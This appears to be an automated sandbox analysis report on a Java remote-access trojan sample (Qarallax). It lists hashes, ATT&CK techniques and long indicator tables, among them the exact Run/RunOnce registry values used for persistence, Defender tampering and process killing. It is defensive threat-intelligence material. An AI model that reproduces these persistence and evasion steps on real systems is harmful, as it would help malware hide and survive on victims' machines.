qarallax | 2540f6138141298d986aa920209ad387686df0ffb9d715245aa1619a9776382d

Analysis

max time kernel
151s
max time network
154s
platform
windows7_x64
resource
win7v200722
submitted
19/08/2020, 13:44 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Inquiry.jar
Size

399KB
MD5

5352736e23d73f99115747c7d3813320
SHA1

79c0cac4a1fcd477e215cdcc57e740e911d79caf
SHA256

2540f6138141298d986aa920209ad387686df0ffb9d715245aa1619a9776382d
SHA512

2c3cb218f0319a44a4ce65fe76b04af07e9bcaec5fbb6055ee099d382464d4d8d239c33086217072f82e344ca30e6850c62169dea3e0a4e092ac3590dd4cd30f

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x000300000001353e-7.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
992	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DhjUvlC = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\DNVJe\\AWHZt.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\DhjUvlC = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\DNVJe\\AWHZt.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	java.exe
File created	C:\Users\Admin\DNVJe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\DNVJe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\CMKGv	java.exe
File opened for modification	C:\Windows\System32\CMKGv	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
1960	taskkill.exe
1676	taskkill.exe
1968	taskkill.exe
868	taskkill.exe
1408	taskkill.exe
2016	taskkill.exe
1988	taskkill.exe
1676	taskkill.exe
1932	taskkill.exe
1864	taskkill.exe
1932	taskkill.exe
1600	taskkill.exe
1492	taskkill.exe
1892	taskkill.exe
1520	taskkill.exe
1892	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2028	powershell.exe
2028	powershell.exe

Suspicious use of AdjustPrivilegeToken 97 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1420	WMIC.exe
Token: SeSecurityPrivilege	1420	WMIC.exe
Token: SeTakeOwnershipPrivilege	1420	WMIC.exe
Token: SeLoadDriverPrivilege	1420	WMIC.exe
Token: SeSystemProfilePrivilege	1420	WMIC.exe
Token: SeSystemtimePrivilege	1420	WMIC.exe
Token: SeProfSingleProcessPrivilege	1420	WMIC.exe
Token: SeIncBasePriorityPrivilege	1420	WMIC.exe
Token: SeCreatePagefilePrivilege	1420	WMIC.exe
Token: SeBackupPrivilege	1420	WMIC.exe
Token: SeRestorePrivilege	1420	WMIC.exe
Token: SeShutdownPrivilege	1420	WMIC.exe
Token: SeDebugPrivilege	1420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1420	WMIC.exe
Token: SeRemoteShutdownPrivilege	1420	WMIC.exe
Token: SeUndockPrivilege	1420	WMIC.exe
Token: SeManageVolumePrivilege	1420	WMIC.exe
Token: 33	1420	WMIC.exe
Token: 34	1420	WMIC.exe
Token: 35	1420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1420	WMIC.exe
Token: SeSecurityPrivilege	1420	WMIC.exe
Token: SeTakeOwnershipPrivilege	1420	WMIC.exe
Token: SeLoadDriverPrivilege	1420	WMIC.exe
Token: SeSystemProfilePrivilege	1420	WMIC.exe
Token: SeSystemtimePrivilege	1420	WMIC.exe
Token: SeProfSingleProcessPrivilege	1420	WMIC.exe
Token: SeIncBasePriorityPrivilege	1420	WMIC.exe
Token: SeCreatePagefilePrivilege	1420	WMIC.exe
Token: SeBackupPrivilege	1420	WMIC.exe
Token: SeRestorePrivilege	1420	WMIC.exe
Token: SeShutdownPrivilege	1420	WMIC.exe
Token: SeDebugPrivilege	1420	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1420	WMIC.exe
Token: SeRemoteShutdownPrivilege	1420	WMIC.exe
Token: SeUndockPrivilege	1420	WMIC.exe
Token: SeManageVolumePrivilege	1420	WMIC.exe
Token: 33	1420	WMIC.exe
Token: 34	1420	WMIC.exe
Token: 35	1420	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeSecurityPrivilege	1872	WMIC.exe
Token: SeTakeOwnershipPrivilege	1872	WMIC.exe
Token: SeLoadDriverPrivilege	1872	WMIC.exe
Token: SeSystemProfilePrivilege	1872	WMIC.exe
Token: SeSystemtimePrivilege	1872	WMIC.exe
Token: SeProfSingleProcessPrivilege	1872	WMIC.exe
Token: SeIncBasePriorityPrivilege	1872	WMIC.exe
Token: SeCreatePagefilePrivilege	1872	WMIC.exe
Token: SeBackupPrivilege	1872	WMIC.exe
Token: SeRestorePrivilege	1872	WMIC.exe
Token: SeShutdownPrivilege	1872	WMIC.exe
Token: SeDebugPrivilege	1872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1872	WMIC.exe
Token: SeRemoteShutdownPrivilege	1872	WMIC.exe
Token: SeUndockPrivilege	1872	WMIC.exe
Token: SeManageVolumePrivilege	1872	WMIC.exe
Token: 33	1872	WMIC.exe
Token: 34	1872	WMIC.exe
Token: 35	1872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1872	WMIC.exe
Token: SeSecurityPrivilege	1872	WMIC.exe
Token: SeTakeOwnershipPrivilege	1872	WMIC.exe
Token: SeLoadDriverPrivilege	1872	WMIC.exe
Token: SeSystemProfilePrivilege	1872	WMIC.exe
Token: SeSystemtimePrivilege	1872	WMIC.exe
Token: SeProfSingleProcessPrivilege	1872	WMIC.exe
Token: SeIncBasePriorityPrivilege	1872	WMIC.exe
Token: SeCreatePagefilePrivilege	1872	WMIC.exe
Token: SeBackupPrivilege	1872	WMIC.exe
Token: SeRestorePrivilege	1872	WMIC.exe
Token: SeShutdownPrivilege	1872	WMIC.exe
Token: SeDebugPrivilege	1872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1872	WMIC.exe
Token: SeRemoteShutdownPrivilege	1872	WMIC.exe
Token: SeUndockPrivilege	1872	WMIC.exe
Token: SeManageVolumePrivilege	1872	WMIC.exe
Token: 33	1872	WMIC.exe
Token: 34	1872	WMIC.exe
Token: 35	1872	WMIC.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	868	taskkill.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1864	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeDebugPrivilege	1520	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
992	java.exe

Suspicious use of WriteProcessMemory 753 IoCs

description	pid	Process	procid_target
PID 992 wrote to memory of 1760	992	java.exe	25
PID 992 wrote to memory of 1760	992	java.exe	25
PID 992 wrote to memory of 1760	992	java.exe	25
PID 992 wrote to memory of 1780	992	java.exe	26
PID 992 wrote to memory of 1780	992	java.exe	26
PID 992 wrote to memory of 1780	992	java.exe	26
PID 1780 wrote to memory of 1420	1780	cmd.exe	27
PID 1780 wrote to memory of 1420	1780	cmd.exe	27
PID 1780 wrote to memory of 1420	1780	cmd.exe	27
PID 992 wrote to memory of 1860	992	java.exe	28
PID 992 wrote to memory of 1860	992	java.exe	28
PID 992 wrote to memory of 1860	992	java.exe	28
PID 1860 wrote to memory of 1872	1860	cmd.exe	29
PID 1860 wrote to memory of 1872	1860	cmd.exe	29
PID 1860 wrote to memory of 1872	1860	cmd.exe	29
PID 992 wrote to memory of 576	992	java.exe	30
PID 992 wrote to memory of 576	992	java.exe	30
PID 992 wrote to memory of 576	992	java.exe	30
PID 992 wrote to memory of 432	992	java.exe	31
PID 992 wrote to memory of 432	992	java.exe	31
PID 992 wrote to memory of 432	992	java.exe	31
PID 992 wrote to memory of 1600	992	java.exe	34
PID 992 wrote to memory of 1600	992	java.exe	34
PID 992 wrote to memory of 1600	992	java.exe	34
PID 992 wrote to memory of 1652	992	java.exe	35
PID 992 wrote to memory of 1652	992	java.exe	35
PID 992 wrote to memory of 1652	992	java.exe	35
PID 992 wrote to memory of 1592	992	java.exe	36
PID 992 wrote to memory of 1592	992	java.exe	36
PID 992 wrote to memory of 1592	992	java.exe	36
PID 992 wrote to memory of 1564	992	java.exe	37
PID 992 wrote to memory of 1564	992	java.exe	37
PID 992 wrote to memory of 1564	992	java.exe	37
PID 992 wrote to memory of 1976	992	java.exe	38
PID 992 wrote to memory of 1976	992	java.exe	38
PID 992 wrote to memory of 1976	992	java.exe	38
PID 992 wrote to memory of 1936	992	java.exe	39
PID 992 wrote to memory of 1936	992	java.exe	39
PID 992 wrote to memory of 1936	992	java.exe	39
PID 992 wrote to memory of 2028	992	java.exe	40
PID 992 wrote to memory of 2028	992	java.exe	40
PID 992 wrote to memory of 2028	992	java.exe	40
PID 992 wrote to memory of 1996	992	java.exe	42
PID 992 wrote to memory of 1996	992	java.exe	42
PID 992 wrote to memory of 1996	992	java.exe	42
PID 992 wrote to memory of 1160	992	java.exe	43
PID 992 wrote to memory of 1160	992	java.exe	43
PID 992 wrote to memory of 1160	992	java.exe	43
PID 992 wrote to memory of 1492	992	java.exe	44
PID 992 wrote to memory of 1492	992	java.exe	44
PID 992 wrote to memory of 1492	992	java.exe	44
PID 992 wrote to memory of 1432	992	java.exe	45
PID 992 wrote to memory of 1432	992	java.exe	45
PID 992 wrote to memory of 1432	992	java.exe	45
PID 992 wrote to memory of 616	992	java.exe	46
PID 992 wrote to memory of 616	992	java.exe	46
PID 992 wrote to memory of 616	992	java.exe	46
PID 1996 wrote to memory of 1196	1996	cmd.exe	47
PID 1996 wrote to memory of 1196	1996	cmd.exe	47
PID 1996 wrote to memory of 1196	1996	cmd.exe	47
PID 992 wrote to memory of 1496	992	java.exe	48
PID 992 wrote to memory of 1496	992	java.exe	48
PID 992 wrote to memory of 1496	992	java.exe	48
PID 992 wrote to memory of 1584	992	java.exe	49
PID 992 wrote to memory of 1584	992	java.exe	49
PID 992 wrote to memory of 1584	992	java.exe	49
PID 992 wrote to memory of 1036	992	java.exe	50
PID 992 wrote to memory of 1036	992	java.exe	50
PID 992 wrote to memory of 1036	992	java.exe	50
PID 992 wrote to memory of 1776	992	java.exe	51
PID 992 wrote to memory of 1776	992	java.exe	51
PID 992 wrote to memory of 1776	992	java.exe	51
PID 992 wrote to memory of 1852	992	java.exe	52
PID 992 wrote to memory of 1852	992	java.exe	52
PID 992 wrote to memory of 1852	992	java.exe	52
PID 992 wrote to memory of 1828	992	java.exe	55
PID 992 wrote to memory of 1828	992	java.exe	55
PID 992 wrote to memory of 1828	992	java.exe	55
PID 992 wrote to memory of 664	992	java.exe	59
PID 992 wrote to memory of 664	992	java.exe	59
PID 992 wrote to memory of 664	992	java.exe	59
PID 1996 wrote to memory of 1544	1996	cmd.exe	62
PID 1996 wrote to memory of 1544	1996	cmd.exe	62
PID 1996 wrote to memory of 1544	1996	cmd.exe	62
PID 992 wrote to memory of 520	992	java.exe	65
PID 992 wrote to memory of 520	992	java.exe	65
PID 992 wrote to memory of 520	992	java.exe	65
PID 992 wrote to memory of 1568	992	java.exe	69
PID 992 wrote to memory of 1568	992	java.exe	69
PID 992 wrote to memory of 1568	992	java.exe	69
PID 992 wrote to memory of 1456	992	java.exe	71
PID 992 wrote to memory of 1456	992	java.exe	71
PID 992 wrote to memory of 1456	992	java.exe	71
PID 992 wrote to memory of 1488	992	java.exe	72
PID 992 wrote to memory of 1488	992	java.exe	72
PID 992 wrote to memory of 1488	992	java.exe	72
PID 1488 wrote to memory of 1820	1488	cmd.exe	73
PID 1488 wrote to memory of 1820	1488	cmd.exe	73
PID 1488 wrote to memory of 1820	1488	cmd.exe	73
PID 992 wrote to memory of 1884	992	java.exe	75
PID 992 wrote to memory of 1884	992	java.exe	75
PID 992 wrote to memory of 1884	992	java.exe	75
PID 992 wrote to memory of 1268	992	java.exe	77
PID 992 wrote to memory of 1268	992	java.exe	77
PID 992 wrote to memory of 1268	992	java.exe	77
PID 1488 wrote to memory of 1640	1488	cmd.exe	78
PID 1488 wrote to memory of 1640	1488	cmd.exe	78
PID 1488 wrote to memory of 1640	1488	cmd.exe	78
PID 992 wrote to memory of 2016	992	java.exe	80
PID 992 wrote to memory of 2016	992	java.exe	80
PID 992 wrote to memory of 2016	992	java.exe	80
PID 992 wrote to memory of 1416	992	java.exe	81
PID 992 wrote to memory of 1416	992	java.exe	81
PID 992 wrote to memory of 1416	992	java.exe	81
PID 992 wrote to memory of 1864	992	java.exe	82
PID 992 wrote to memory of 1864	992	java.exe	82
PID 992 wrote to memory of 1864	992	java.exe	82
PID 992 wrote to memory of 1616	992	java.exe	86
PID 992 wrote to memory of 1616	992	java.exe	86
PID 992 wrote to memory of 1616	992	java.exe	86
PID 992 wrote to memory of 1588	992	java.exe	88
PID 992 wrote to memory of 1588	992	java.exe	88
PID 992 wrote to memory of 1588	992	java.exe	88
PID 992 wrote to memory of 1816	992	java.exe	89
PID 992 wrote to memory of 1816	992	java.exe	89
PID 992 wrote to memory of 1816	992	java.exe	89
PID 1588 wrote to memory of 1924	1588	cmd.exe	90
PID 1588 wrote to memory of 1924	1588	cmd.exe	90
PID 1588 wrote to memory of 1924	1588	cmd.exe	90
PID 992 wrote to memory of 740	992	java.exe	92
PID 992 wrote to memory of 740	992	java.exe	92
PID 992 wrote to memory of 740	992	java.exe	92
PID 1588 wrote to memory of 1988	1588	cmd.exe	94
PID 1588 wrote to memory of 1988	1588	cmd.exe	94
PID 1588 wrote to memory of 1988	1588	cmd.exe	94
PID 992 wrote to memory of 520	992	java.exe	95
PID 992 wrote to memory of 520	992	java.exe	95
PID 992 wrote to memory of 520	992	java.exe	95
PID 992 wrote to memory of 1968	992	java.exe	96
PID 992 wrote to memory of 1968	992	java.exe	96
PID 992 wrote to memory of 1968	992	java.exe	96
PID 520 wrote to memory of 316	520	cmd.exe	98
PID 520 wrote to memory of 316	520	cmd.exe	98
PID 520 wrote to memory of 316	520	cmd.exe	98
PID 520 wrote to memory of 1436	520	cmd.exe	99
PID 520 wrote to memory of 1436	520	cmd.exe	99
PID 520 wrote to memory of 1436	520	cmd.exe	99
PID 992 wrote to memory of 1036	992	java.exe	100
PID 992 wrote to memory of 1036	992	java.exe	100
PID 992 wrote to memory of 1036	992	java.exe	100
PID 1036 wrote to memory of 1868	1036	cmd.exe	101
PID 1036 wrote to memory of 1868	1036	cmd.exe	101
PID 1036 wrote to memory of 1868	1036	cmd.exe	101
PID 1036 wrote to memory of 1876	1036	cmd.exe	102
PID 1036 wrote to memory of 1876	1036	cmd.exe	102
PID 1036 wrote to memory of 1876	1036	cmd.exe	102
PID 992 wrote to memory of 1456	992	java.exe	103
PID 992 wrote to memory of 1456	992	java.exe	103
PID 992 wrote to memory of 1456	992	java.exe	103
PID 1456 wrote to memory of 1316	1456	cmd.exe	104
PID 1456 wrote to memory of 1316	1456	cmd.exe	104
PID 1456 wrote to memory of 1316	1456	cmd.exe	104
PID 1456 wrote to memory of 1852	1456	cmd.exe	105
PID 1456 wrote to memory of 1852	1456	cmd.exe	105
PID 1456 wrote to memory of 1852	1456	cmd.exe	105
PID 992 wrote to memory of 468	992	java.exe	107
PID 992 wrote to memory of 468	992	java.exe	107
PID 992 wrote to memory of 468	992	java.exe	107
PID 468 wrote to memory of 1584	468	cmd.exe	108
PID 468 wrote to memory of 1584	468	cmd.exe	108
PID 468 wrote to memory of 1584	468	cmd.exe	108
PID 468 wrote to memory of 1888	468	cmd.exe	109
PID 468 wrote to memory of 1888	468	cmd.exe	109
PID 468 wrote to memory of 1888	468	cmd.exe	109
PID 992 wrote to memory of 1816	992	java.exe	110
PID 992 wrote to memory of 1816	992	java.exe	110
PID 992 wrote to memory of 1816	992	java.exe	110
PID 992 wrote to memory of 868	992	java.exe	111
PID 992 wrote to memory of 868	992	java.exe	111
PID 992 wrote to memory of 868	992	java.exe	111
PID 1816 wrote to memory of 1988	1816	cmd.exe	112
PID 1816 wrote to memory of 1988	1816	cmd.exe	112
PID 1816 wrote to memory of 1988	1816	cmd.exe	112
PID 1816 wrote to memory of 1656	1816	cmd.exe	114
PID 1816 wrote to memory of 1656	1816	cmd.exe	114
PID 1816 wrote to memory of 1656	1816	cmd.exe	114
PID 992 wrote to memory of 316	992	java.exe	115
PID 992 wrote to memory of 316	992	java.exe	115
PID 992 wrote to memory of 316	992	java.exe	115
PID 316 wrote to memory of 1436	316	cmd.exe	116
PID 316 wrote to memory of 1436	316	cmd.exe	116
PID 316 wrote to memory of 1436	316	cmd.exe	116
PID 316 wrote to memory of 1644	316	cmd.exe	117
PID 316 wrote to memory of 1644	316	cmd.exe	117
PID 316 wrote to memory of 1644	316	cmd.exe	117
PID 992 wrote to memory of 240	992	java.exe	118
PID 992 wrote to memory of 240	992	java.exe	118
PID 992 wrote to memory of 240	992	java.exe	118
PID 240 wrote to memory of 1316	240	cmd.exe	119
PID 240 wrote to memory of 1316	240	cmd.exe	119
PID 240 wrote to memory of 1316	240	cmd.exe	119
PID 240 wrote to memory of 1852	240	cmd.exe	120
PID 240 wrote to memory of 1852	240	cmd.exe	120
PID 240 wrote to memory of 1852	240	cmd.exe	120
PID 992 wrote to memory of 2024	992	java.exe	121
PID 992 wrote to memory of 2024	992	java.exe	121
PID 992 wrote to memory of 2024	992	java.exe	121
PID 2024 wrote to memory of 268	2024	cmd.exe	122
PID 2024 wrote to memory of 268	2024	cmd.exe	122
PID 2024 wrote to memory of 268	2024	cmd.exe	122
PID 2024 wrote to memory of 1928	2024	cmd.exe	123
PID 2024 wrote to memory of 1928	2024	cmd.exe	123
PID 2024 wrote to memory of 1928	2024	cmd.exe	123
PID 992 wrote to memory of 1776	992	java.exe	124
PID 992 wrote to memory of 1776	992	java.exe	124
PID 992 wrote to memory of 1776	992	java.exe	124
PID 1776 wrote to memory of 1640	1776	cmd.exe	125
PID 1776 wrote to memory of 1640	1776	cmd.exe	125
PID 1776 wrote to memory of 1640	1776	cmd.exe	125
PID 1776 wrote to memory of 1820	1776	cmd.exe	126
PID 1776 wrote to memory of 1820	1776	cmd.exe	126
PID 1776 wrote to memory of 1820	1776	cmd.exe	126
PID 992 wrote to memory of 1568	992	java.exe	127
PID 992 wrote to memory of 1568	992	java.exe	127
PID 992 wrote to memory of 1568	992	java.exe	127
PID 992 wrote to memory of 1988	992	java.exe	128
PID 992 wrote to memory of 1988	992	java.exe	128
PID 992 wrote to memory of 1988	992	java.exe	128
PID 1568 wrote to memory of 1644	1568	cmd.exe	130
PID 1568 wrote to memory of 1644	1568	cmd.exe	130
PID 1568 wrote to memory of 1644	1568	cmd.exe	130
PID 1568 wrote to memory of 1112	1568	cmd.exe	131
PID 1568 wrote to memory of 1112	1568	cmd.exe	131
PID 1568 wrote to memory of 1112	1568	cmd.exe	131
PID 992 wrote to memory of 1316	992	java.exe	132
PID 992 wrote to memory of 1316	992	java.exe	132
PID 992 wrote to memory of 1316	992	java.exe	132
PID 1316 wrote to memory of 1876	1316	cmd.exe	133
PID 1316 wrote to memory of 1876	1316	cmd.exe	133
PID 1316 wrote to memory of 1876	1316	cmd.exe	133
PID 1316 wrote to memory of 1844	1316	cmd.exe	134
PID 1316 wrote to memory of 1844	1316	cmd.exe	134
PID 1316 wrote to memory of 1844	1316	cmd.exe	134
PID 992 wrote to memory of 788	992	java.exe	135
PID 992 wrote to memory of 788	992	java.exe	135
PID 992 wrote to memory of 788	992	java.exe	135
PID 788 wrote to memory of 1408	788	cmd.exe	136
PID 788 wrote to memory of 1408	788	cmd.exe	136
PID 788 wrote to memory of 1408	788	cmd.exe	136
PID 788 wrote to memory of 280	788	cmd.exe	137
PID 788 wrote to memory of 280	788	cmd.exe	137
PID 788 wrote to memory of 280	788	cmd.exe	137
PID 992 wrote to memory of 1892	992	java.exe	138
PID 992 wrote to memory of 1892	992	java.exe	138
PID 992 wrote to memory of 1892	992	java.exe	138
PID 1892 wrote to memory of 1432	1892	cmd.exe	139
PID 1892 wrote to memory of 1432	1892	cmd.exe	139
PID 1892 wrote to memory of 1432	1892	cmd.exe	139
PID 1892 wrote to memory of 616	1892	cmd.exe	140
PID 1892 wrote to memory of 616	1892	cmd.exe	140
PID 1892 wrote to memory of 616	1892	cmd.exe	140
PID 992 wrote to memory of 1536	992	java.exe	141
PID 992 wrote to memory of 1536	992	java.exe	141
PID 992 wrote to memory of 1536	992	java.exe	141
PID 1536 wrote to memory of 1848	1536	cmd.exe	142
PID 1536 wrote to memory of 1848	1536	cmd.exe	142
PID 1536 wrote to memory of 1848	1536	cmd.exe	142
PID 992 wrote to memory of 1960	992	java.exe	143
PID 992 wrote to memory of 1960	992	java.exe	143
PID 992 wrote to memory of 1960	992	java.exe	143
PID 1536 wrote to memory of 268	1536	cmd.exe	145
PID 1536 wrote to memory of 268	1536	cmd.exe	145
PID 1536 wrote to memory of 268	1536	cmd.exe	145
PID 992 wrote to memory of 1864	992	java.exe	146
PID 992 wrote to memory of 1864	992	java.exe	146
PID 992 wrote to memory of 1864	992	java.exe	146
PID 1864 wrote to memory of 1496	1864	cmd.exe	147
PID 1864 wrote to memory of 1496	1864	cmd.exe	147
PID 1864 wrote to memory of 1496	1864	cmd.exe	147
PID 1864 wrote to memory of 1504	1864	cmd.exe	148
PID 1864 wrote to memory of 1504	1864	cmd.exe	148
PID 1864 wrote to memory of 1504	1864	cmd.exe	148
PID 992 wrote to memory of 1196	992	java.exe	149
PID 992 wrote to memory of 1196	992	java.exe	149
PID 992 wrote to memory of 1196	992	java.exe	149
PID 1196 wrote to memory of 1880	1196	cmd.exe	150
PID 1196 wrote to memory of 1880	1196	cmd.exe	150
PID 1196 wrote to memory of 1880	1196	cmd.exe	150
PID 992 wrote to memory of 1676	992	java.exe	151
PID 992 wrote to memory of 1676	992	java.exe	151
PID 992 wrote to memory of 1676	992	java.exe	151
PID 1196 wrote to memory of 1920	1196	cmd.exe	152
PID 1196 wrote to memory of 1920	1196	cmd.exe	152
PID 1196 wrote to memory of 1920	1196	cmd.exe	152
PID 992 wrote to memory of 1872	992	java.exe	154
PID 992 wrote to memory of 1872	992	java.exe	154
PID 992 wrote to memory of 1872	992	java.exe	154
PID 1872 wrote to memory of 1904	1872	cmd.exe	155
PID 1872 wrote to memory of 1904	1872	cmd.exe	155
PID 1872 wrote to memory of 1904	1872	cmd.exe	155
PID 1872 wrote to memory of 268	1872	cmd.exe	156
PID 1872 wrote to memory of 268	1872	cmd.exe	156
PID 1872 wrote to memory of 268	1872	cmd.exe	156
PID 992 wrote to memory of 1808	992	java.exe	157
PID 992 wrote to memory of 1808	992	java.exe	157
PID 992 wrote to memory of 1808	992	java.exe	157
PID 1808 wrote to memory of 1888	1808	cmd.exe	158
PID 1808 wrote to memory of 1888	1808	cmd.exe	158
PID 1808 wrote to memory of 1888	1808	cmd.exe	158
PID 1808 wrote to memory of 1408	1808	cmd.exe	159
PID 1808 wrote to memory of 1408	1808	cmd.exe	159
PID 1808 wrote to memory of 1408	1808	cmd.exe	159
PID 992 wrote to memory of 1100	992	java.exe	160
PID 992 wrote to memory of 1100	992	java.exe	160
PID 992 wrote to memory of 1100	992	java.exe	160
PID 1100 wrote to memory of 1960	1100	cmd.exe	161
PID 1100 wrote to memory of 1960	1100	cmd.exe	161
PID 1100 wrote to memory of 1960	1100	cmd.exe	161
PID 1100 wrote to memory of 1880	1100	cmd.exe	162
PID 1100 wrote to memory of 1880	1100	cmd.exe	162
PID 1100 wrote to memory of 1880	1100	cmd.exe	162
PID 992 wrote to memory of 1852	992	java.exe	163
PID 992 wrote to memory of 1852	992	java.exe	163
PID 992 wrote to memory of 1852	992	java.exe	163
PID 1852 wrote to memory of 1924	1852	cmd.exe	164
PID 1852 wrote to memory of 1924	1852	cmd.exe	164
PID 1852 wrote to memory of 1924	1852	cmd.exe	164
PID 1852 wrote to memory of 1876	1852	cmd.exe	165
PID 1852 wrote to memory of 1876	1852	cmd.exe	165
PID 1852 wrote to memory of 1876	1852	cmd.exe	165
PID 992 wrote to memory of 1496	992	java.exe	166
PID 992 wrote to memory of 1496	992	java.exe	166
PID 992 wrote to memory of 1496	992	java.exe	166
PID 1496 wrote to memory of 1308	1496	cmd.exe	167
PID 1496 wrote to memory of 1308	1496	cmd.exe	167
PID 1496 wrote to memory of 1308	1496	cmd.exe	167
PID 992 wrote to memory of 1408	992	java.exe	168
PID 992 wrote to memory of 1408	992	java.exe	168
PID 992 wrote to memory of 1408	992	java.exe	168
PID 1496 wrote to memory of 1640	1496	cmd.exe	170
PID 1496 wrote to memory of 1640	1496	cmd.exe	170
PID 1496 wrote to memory of 1640	1496	cmd.exe	170
PID 992 wrote to memory of 1848	992	java.exe	171
PID 992 wrote to memory of 1848	992	java.exe	171
PID 992 wrote to memory of 1848	992	java.exe	171
PID 1848 wrote to memory of 1676	1848	cmd.exe	172
PID 1848 wrote to memory of 1676	1848	cmd.exe	172
PID 1848 wrote to memory of 1676	1848	cmd.exe	172
PID 1848 wrote to memory of 1924	1848	cmd.exe	173
PID 1848 wrote to memory of 1924	1848	cmd.exe	173
PID 1848 wrote to memory of 1924	1848	cmd.exe	173
PID 992 wrote to memory of 512	992	java.exe	174
PID 992 wrote to memory of 512	992	java.exe	174
PID 992 wrote to memory of 512	992	java.exe	174
PID 512 wrote to memory of 1932	512	cmd.exe	175
PID 512 wrote to memory of 1932	512	cmd.exe	175
PID 512 wrote to memory of 1932	512	cmd.exe	175
PID 512 wrote to memory of 1640	512	cmd.exe	176
PID 512 wrote to memory of 1640	512	cmd.exe	176
PID 512 wrote to memory of 1640	512	cmd.exe	176
PID 992 wrote to memory of 616	992	java.exe	177
PID 992 wrote to memory of 616	992	java.exe	177
PID 992 wrote to memory of 616	992	java.exe	177
PID 616 wrote to memory of 1676	616	cmd.exe	178
PID 616 wrote to memory of 1676	616	cmd.exe	178
PID 616 wrote to memory of 1676	616	cmd.exe	178
PID 616 wrote to memory of 868	616	cmd.exe	179
PID 616 wrote to memory of 868	616	cmd.exe	179
PID 616 wrote to memory of 868	616	cmd.exe	179
PID 992 wrote to memory of 1544	992	java.exe	180
PID 992 wrote to memory of 1544	992	java.exe	180
PID 992 wrote to memory of 1544	992	java.exe	180
PID 1544 wrote to memory of 1920	1544	cmd.exe	181
PID 1544 wrote to memory of 1920	1544	cmd.exe	181
PID 1544 wrote to memory of 1920	1544	cmd.exe	181
PID 1544 wrote to memory of 1968	1544	cmd.exe	182
PID 1544 wrote to memory of 1968	1544	cmd.exe	182
PID 1544 wrote to memory of 1968	1544	cmd.exe	182
PID 992 wrote to memory of 1308	992	java.exe	183
PID 992 wrote to memory of 1308	992	java.exe	183
PID 992 wrote to memory of 1308	992	java.exe	183
PID 1308 wrote to memory of 1924	1308	cmd.exe	184
PID 1308 wrote to memory of 1924	1308	cmd.exe	184
PID 1308 wrote to memory of 1924	1308	cmd.exe	184
PID 992 wrote to memory of 1676	992	java.exe	185
PID 992 wrote to memory of 1676	992	java.exe	185
PID 992 wrote to memory of 1676	992	java.exe	185
PID 1308 wrote to memory of 1820	1308	cmd.exe	187
PID 1308 wrote to memory of 1820	1308	cmd.exe	187
PID 1308 wrote to memory of 1820	1308	cmd.exe	187
PID 992 wrote to memory of 1160	992	java.exe	188
PID 992 wrote to memory of 1160	992	java.exe	188
PID 992 wrote to memory of 1160	992	java.exe	188
PID 1160 wrote to memory of 1592	1160	cmd.exe	189
PID 1160 wrote to memory of 1592	1160	cmd.exe	189
PID 1160 wrote to memory of 1592	1160	cmd.exe	189
PID 1160 wrote to memory of 584	1160	cmd.exe	190
PID 1160 wrote to memory of 584	1160	cmd.exe	190
PID 1160 wrote to memory of 584	1160	cmd.exe	190
PID 992 wrote to memory of 1100	992	java.exe	191
PID 992 wrote to memory of 1100	992	java.exe	191
PID 992 wrote to memory of 1100	992	java.exe	191
PID 1100 wrote to memory of 1844	1100	cmd.exe	192
PID 1100 wrote to memory of 1844	1100	cmd.exe	192
